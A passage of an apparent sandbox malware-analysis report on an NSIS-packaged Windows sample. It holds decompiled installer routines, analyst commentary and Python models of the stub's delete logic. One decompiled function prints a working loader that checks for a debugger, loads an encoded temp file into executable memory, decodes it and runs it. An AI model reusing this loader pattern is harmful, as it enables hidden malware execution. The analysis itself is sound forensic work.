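        if "lstrcmpiA" in apis:
            msg += " after comparing its own file name with u_.exe"
        findings["nsis_uninstaller_relocation"] = msg
    if "_?=" in args:
        findings["nsis_uninstaller_reexec"] = "re-launches the copy with ' _?=<original directory>'"
    for r in records:
        if r["api"] == "ExitWindowsEx" and r["args"]:
            flags = "|".join(decode_ewx(r["args"][0]))
            how = ("after resolving AdjustTokenPrivileges by name"
                   if "AdjustTokenPrivileges" in args else "without a privilege adjust")
            findings["reboot_request"] = f"ExitWindowsEx({flags}) at {r['ref']} {how}"
    return findings


if __name__ == "__main__":
    for key, text in triage(parse_api_lines(SAMPLE_API_LINES)).items():
        print(f"{key}: {text}")
```

All three findings fire on the lines above, and all three are stub boilerplate: the reboot code only runs when the script requested one, and the self-copy is how every NSIS uninstaller lets its own file be removed. The payload's behaviour has to be looked for elsewhere in the report.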
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                          • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\TazxfJHRhq.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                          • API String ID: 3079827372-293403378
                                                                          • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                          • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                          • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                          • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
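The decompiled routine E00405301 that follows is the stub's file and directory delete primitive, the code behind the NSIS `Delete` and `RMDir` instructions. Its behaviour is decided by four bits of `_a8`: bit 3 (0x8) is a plain `DeleteFileA` whose failure bumps the error counter at 0x7a3008; bit 0 (0x1) marks the path as a directory, so `\*.*` is appended and the entries are enumerated with `FindFirstFileA`; bit 1 (0x2) together with bit 0 recurses into subdirectories (the `(_a8 & 3) == 3` test); bit 2 (0x4) turns a failed delete into a delete-on-reboot (`E00405707`, which wraps `MoveFileExA` with delay-until-reboot) instead of an error. Each file first has its read-only attribute cleared (`_t51 & 0xfe`). The Python below is a model of that logic added here; it is not part of the report or of NSIS. The directory-removal step after the enumeration loop is taken from the NSIS exehead source rather than read off this listing, and is marked as an assumption in the code; the sample tree it deletes is constructed inline.

```python
import fnmatch
import os
import shutil
import stat
import tempfile
from dataclasses import dataclass, field

# The four bits the routine tests in _a8.
DEL_DIR = 0x1      # path names a directory: enumerate path\*.*
DEL_RECURSE = 0x2  # with DEL_DIR, descend into subdirectories
DEL_REBOOT = 0x4   # a failed delete is deferred until reboot instead of counted as an error
DEL_SIMPLE = 0x8   # plain DeleteFileA(path), no enumeration


@dataclass
class DeleteResult:
    deleted: list = field(default_factory=list)
    deferred_to_reboot: list = field(default_factory=list)  # what E00405707 would hand to MoveFileExA
    exec_error: int = 0  # the counter the routine bumps at 0x7a3008


def _os_delete(path):
    try:
        os.remove(path)
        return True
    except OSError:
        return False


def nsis_delete(path, flags, result=None, delete_file=_os_delete):
    """Delete `path` with the routine's semantics. `delete_file` stands in for
    DeleteFileA (True on success) so a locked file can be simulated."""
    result = result if result is not None else DeleteResult()
    if flags & DEL_SIMPLE:                      # the early DeleteFileA branch
        if delete_file(path):
            result.deleted.append(path)
        else:
            result.exec_error += 1
        return result
    if flags & DEL_DIR:
        folder, pattern = path, "*"             # lstrcatA(buf, "\\*.*")
    else:
        folder, pattern = os.path.split(path)   # path is a wildcard; E00405513 keeps its folder
    # FindFirstFileA/FindNextFileA loop. os.listdir never yields "." or "..", which the
    # routine skips by hand; the cAlternateFileName fallback for names containing '?' is omitted.
    try:
        entries = sorted(os.listdir(folder))
    except OSError:
        entries = []                            # INVALID_HANDLE_VALUE: nothing to enumerate
    for name in entries:
        if not fnmatch.fnmatch(name, pattern):
            continue
        full = os.path.join(folder, name)
        if os.path.isdir(full):                 # FILE_ATTRIBUTE_DIRECTORY
            if (flags & (DEL_DIR | DEL_RECURSE)) == (DEL_DIR | DEL_RECURSE):
                nsis_delete(full, flags, result, delete_file)
            continue
        os.chmod(full, os.stat(full).st_mode | stat.S_IWUSR)  # attrs & ~FILE_ATTRIBUTE_READONLY
        if delete_file(full):
            result.deleted.append(full)         # E00404D62(0xfffffff2, ...) status line
        elif flags & DEL_REBOOT:
            result.deferred_to_reboot.append(full)  # E00404D62(0xfffffff1) + E00405707(path, 0)
        else:
            result.exec_error += 1
    if flags & DEL_DIR:
        # Assumption from the NSIS exehead source: after the loop the trailing backslash is
        # cut (the *_t31 = 0 write) and the directory itself removed, with the same failure handling.
        try:
            os.rmdir(folder)
            result.deleted.append(folder)
        except OSError:
            if flags & DEL_REBOOT:
                result.deferred_to_reboot.append(folder)
            else:
                result.exec_error += 1
    return result


def _make_tree():
    """Constructed sample tree: two files at the top (one read-only), two nested."""
    root = tempfile.mkdtemp(prefix="nsis_model_")
    os.makedirs(os.path.join(root, "sub", "deep"))
    for rel in ("a.txt", "b.log", os.path.join("sub", "c.txt"), os.path.join("sub", "deep", "d.dat")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("x")
    os.chmod(os.path.join(root, "b.log"), stat.S_IRUSR)
    return root


def demo_recursive():
    """RMDir /r equivalent: everything goes, read-only file included."""
    root = _make_tree()
    res = nsis_delete(root, DEL_DIR | DEL_RECURSE)
    return res, os.path.exists(root)


def demo_locked(extra_flags):
    """b.log refuses to delete (simulated lock); returns (deferred paths, error count)."""
    root = _make_tree()
    refuse = lambda p: False if p.endswith("b.log") else _os_delete(p)
    res = nsis_delete(root, DEL_DIR | DEL_RECURSE | extra_flags, delete_file=refuse)
    deferred = [os.path.relpath(p, root) for p in res.deferred_to_reboot]
    shutil.rmtree(root, ignore_errors=True)
    return deferred, res.exec_error
```

The locked-file case is the one that matters for forensics: with the reboot bit set the stub leaves the file in place and queues it (and the directory that still contains it) for deletion on the next boot, so an artefact that "survived" the uninstaller may simply be waiting for a reboot that the sandbox never performed.
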

                                                                          C-Code - Quality: 98%
                                                                          			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				struct _WIN32_FIND_DATAA _v332;
                                                                          				signed int _t37;
                                                                          				char* _t49;
                                                                          				signed char _t51;
                                                                          				signed int _t54;
                                                                          				signed int _t57;
                                                                          				signed int _t63;
                                                                          				signed int _t65;
                                                                          				void* _t67;
                                                                          				signed int _t70;
                                                                          				CHAR* _t72;
                                                                          				CHAR* _t74;
                                                                          				char* _t77;
                                                                          
                                                                          				_t74 = _a4;
                                                                          				_t37 = E004055AC(__eflags, _t74);
                                                                          				_v12 = _t37;
                                                                          				if((_a8 & 0x00000008) != 0) {
                                                                          					_t65 = DeleteFileA(_t74); // executed
                                                                          					asm("sbb eax, eax");
                                                                          					_t67 =  ~_t65 + 1;
                                                                          					 *0x7a3008 =  *0x7a3008 + _t67;
                                                                          					return _t67;
                                                                          				}
                                                                          				_t70 = _a8 & 0x00000001;
                                                                          				__eflags = _t70;
                                                                          				_v8 = _t70;
                                                                          				if(_t70 == 0) {
                                                                          					L5:
                                                                          					E004059BF(0x7a0588, _t74);
                                                                          					__eflags = _t70;
                                                                          					if(_t70 == 0) {
                                                                          						E00405513(_t74);
                                                                          					} else {
                                                                          						lstrcatA(0x7a0588, "\\*.*");
                                                                          					}
                                                                          					lstrcatA(_t74, 0x409010);
                                                                          					_t72 =  &(_t74[lstrlenA(_t74)]);
                                                                          					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                                                          					__eflags = _t37 - 0xffffffff;
                                                                          					_a4 = _t37;
                                                                          					if(_t37 == 0xffffffff) {
                                                                          						L26:
                                                                          						__eflags = _v8;
                                                                          						if(_v8 != 0) {
                                                                          							_t31 = _t72 - 1;
                                                                          							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                                                          							__eflags =  *_t31;
                                                                          						}
                                                                          						goto L28;
                                                                          					} else {
                                                                          						goto L9;
                                                                          					}
                                                                          					do {
                                                                          						L9:
                                                                          						_t77 =  &(_v332.cFileName);
                                                                          						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                                                          						__eflags =  *_t49;
                                                                          						if( *_t49 != 0) {
                                                                          							__eflags = _v332.cAlternateFileName;
                                                                          							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

APIs
• DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040531F
• lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405369
• lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 0040537C
• lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405382
• FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 00405393
• FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
• FindClose.KERNEL32(?), ref: 0040545B
Strings
• "C:\Users\user\Desktop\TazxfJHRhq.exe" , xrefs: 0040530B
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
• \*.*, xrefs: 00405363
Memory Dump Source
• Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
• Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\TazxfJHRhq.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-3498229369
• Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
• Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
• Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
• Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E73791000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t31;
				void* _t33;
				long _t36;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ael13j4hp6ajgnz");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t33 = _t16;
					if(_t33 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t33, 0);
					_t36 = _t16;
					if(_t36 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t36, 0x3000, 0x40); // executed
					 *0x73793000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t33, _t16, _t36,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t31 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x73793000(); // executed
						goto L11;
					}
					do {
						asm("rol al, 1");
						asm("rol al, 0x2");
						asm("ror al, 0x2");
						 *( *0x73793000 + _t31) = (( ~((( *( *0x73793000 + _t31) ^ _t31 ^ 0x000000c0) + 0x0000000b ^ _t31) + _t31) - _t31 ^ _t31) - _t31 ^ 0x00000025) + 1;
						_t31 = _t31 + 1;
					} while (_t31 < _v8);
					goto L10;
				}
				return _t12;
			}

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 73791010
                                                                          • DebugBreak.KERNEL32 ref: 7379101A
                                                                          • GetTempPathW.KERNEL32(00000103,?), ref: 7379102C
                                                                          • lstrcatW.KERNEL32(?,\ael13j4hp6ajgnz), ref: 73791047
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 73791066
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 7379107B
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 73791092
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 737910AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220401569.0000000073791000.00000020.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                          • Associated: 00000000.00000002.220397111.0000000073790000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.220405676.0000000073792000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.220411526.0000000073794000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                          • String ID: \ael13j4hp6ajgnz
                                                                          • API String ID: 4020703165-2761218979
                                                                          • Opcode ID: 80365d1e5a8c967f633472baddaf4ac3b30c1a9722327648c7395358831834cf
                                                                          • Instruction ID: 763e3cd5209518c6112f06209167ab0c77c74176ddcd3738565ed638fdddf36d
                                                                          • Opcode Fuzzy Hash: 80365d1e5a8c967f633472baddaf4ac3b30c1a9722327648c7395358831834cf
                                                                          • Instruction Fuzzy Hash: E821E53550120EAEF7207B7A8C8EBEA3F78EB06740F234354E95AE71C1DA38551BD624
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E00401FDC(int __ebx) {
                                                                          				struct HINSTANCE__* _t20;
                                                                          				struct HINSTANCE__* _t27;
                                                                          				int _t28;
                                                                          				struct HINSTANCE__* _t33;
                                                                          				CHAR* _t35;
                                                                          				intOrPtr* _t36;
                                                                          				void* _t37;
                                                                          
                                                                          				_t28 = __ebx;
                                                                          				 *(_t37 - 4) = 1;
                                                                          				SetErrorMode(0x8001); // executed
                                                                          				if( *0x7a3030 < __ebx) {
                                                                          					_push(0xffffffe7);
                                                                          					goto L14;
                                                                          				} else {
                                                                          					_t35 = E00402A9A(0xfffffff0);
                                                                          					 *(_t37 + 8) = E00402A9A(1);
                                                                          					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
                                                                          						L3:
                                                                          						_t20 = LoadLibraryA(_t35); // executed
                                                                          						_t33 = _t20;
                                                                          						if(_t33 == _t28) {
                                                                          							_push(0xfffffff6);
                                                                          							L14:
                                                                          							E00401428();
                                                                          						} else {
                                                                          							goto L4;
                                                                          						}
                                                                          					} else {
                                                                          						_t27 = GetModuleHandleA(_t35); // executed
                                                                          						_t33 = _t27;
                                                                          						if(_t33 != __ebx) {
                                                                          							L4:
                                                                          							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
                                                                          							if(_t36 == _t28) {
                                                                          								E00404D62(0xfffffff7,  *(_t37 + 8));
                                                                          							} else {
                                                                          								 *(_t37 - 4) = _t28;
                                                                          								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
                                                                          									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
                                                                          								} else {
                                                                          									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
                                                                          									if( *_t36() != 0) {
                                                                          										 *(_t37 - 4) = 1;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
                                                                          								FreeLibrary(_t33);
                                                                          							}
                                                                          						} else {
                                                                          							goto L3;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				SetErrorMode(_t28);
                                                                          				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
                                                                          				return 0;
                                                                          			}


                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                            • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                            • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                            • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                            • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                          • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                          • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                          • SetErrorMode.KERNEL32 ref: 0040209B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 1609199483-0
                                                                          • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                          • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                          • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                          • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405C94(CHAR* _a4) {
                                                                          				void* _t3;
                                                                          				void* _t8;
                                                                          
                                                                          				SetErrorMode(0x8001); // executed
                                                                          				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                                                          				_t8 = _t3; // executed
                                                                          				SetErrorMode(0); // executed
                                                                          				if(_t8 == 0xffffffff) {
                                                                          					return 0;
                                                                          				}
                                                                          				FindClose(_t8); // executed
                                                                          				return 0x7a15d0;
                                                                          			}


                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 00405CA2
                                                                          • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                          • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                          • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: ErrorFindMode$CloseFileFirst
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2885216544-3916508600
                                                                          • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                          • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                          • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                          • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E00403526() {
                                                                          				intOrPtr _v4;
                                                                          				intOrPtr _v8;
                                                                          				int _v12;
                                                                          				int _v16;
                                                                          				char _v20;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				intOrPtr* _t20;
                                                                          				void* _t28;
                                                                          				void* _t30;
                                                                          				int _t31;
                                                                          				void* _t34;
                                                                          				struct HINSTANCE__* _t37;
                                                                          				int _t38;
                                                                          				int _t42;
                                                                          				char _t61;
                                                                          				CHAR* _t63;
                                                                          				signed char _t67;
                                                                          				CHAR* _t78;
                                                                          				intOrPtr _t80;
                                                                          				CHAR* _t82;
                                                                          				CHAR* _t84;
                                                                          				CHAR* _t85;
                                                                          
                                                                          				_t80 =  *0x7a2f88;
                                                                          				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
                                                                          				_t88 = _t20;
                                                                          				if(_t20 == 0) {
                                                                          					_t78 = 0x79f580;
                                                                          					"1033" = 0x7830;
                                                                          					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
                                                                          					__eflags =  *0x79f580;
                                                                          					if(__eflags == 0) {
                                                                          						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
                                                                          					}
                                                                          					lstrcatA("1033", _t78);
                                                                          				} else {
                                                                          					E0040591D("1033",  *_t20() & 0x0000ffff);
                                                                          				}
                                                                          				E004037F2(_t75, _t88);
                                                                          				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                          				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
                                                                          				if(E004055AC(_t88, _t84) != 0) {
                                                                          					L16:
                                                                          					if(E004055AC(_t96, _t84) == 0) {
                                                                          						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                                          						_push(_t84);
                                                                          						E004059E1(0, _t78, _t80);
                                                                          					}
                                                                          					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                          					 *0x7a2768 = _t28;
                                                                          					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                          						L21:
                                                                          						if(E00401410(0) == 0) {
                                                                          							_t30 = E004037F2(_t75, __eflags);
                                                                          							__eflags =  *0x7a3020;
                                                                          							if( *0x7a3020 != 0) {
                                                                          								_t31 = E00404E34(_t30, 0);
                                                                          								__eflags = _t31;
                                                                          								if(_t31 == 0) {
                                                                          									E00401410(1);
                                                                          									goto L33;
                                                                          								}
                                                                          								__eflags =  *0x7a274c;
                                                                          								if( *0x7a274c == 0) {
                                                                          									E00401410(2);
                                                                          								}
                                                                          								goto L22;
                                                                          							}
                                                                          							ShowWindow( *0x79f560, 5);
                                                                          							_t85 = "RichEd20.dll";
                                                                          							_t37 = LoadLibraryA(_t85);
                                                                          							__eflags = _t37;
                                                                          							if(_t37 == 0) {
                                                                          								M004092B6 = 0x3233;
                                                                          								LoadLibraryA(_t85);
                                                                          							}
                                                                          							_t82 = "RichEdit20A";
                                                                          							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
                                                                          							__eflags = _t38;
                                                                          							if(_t38 == 0) {
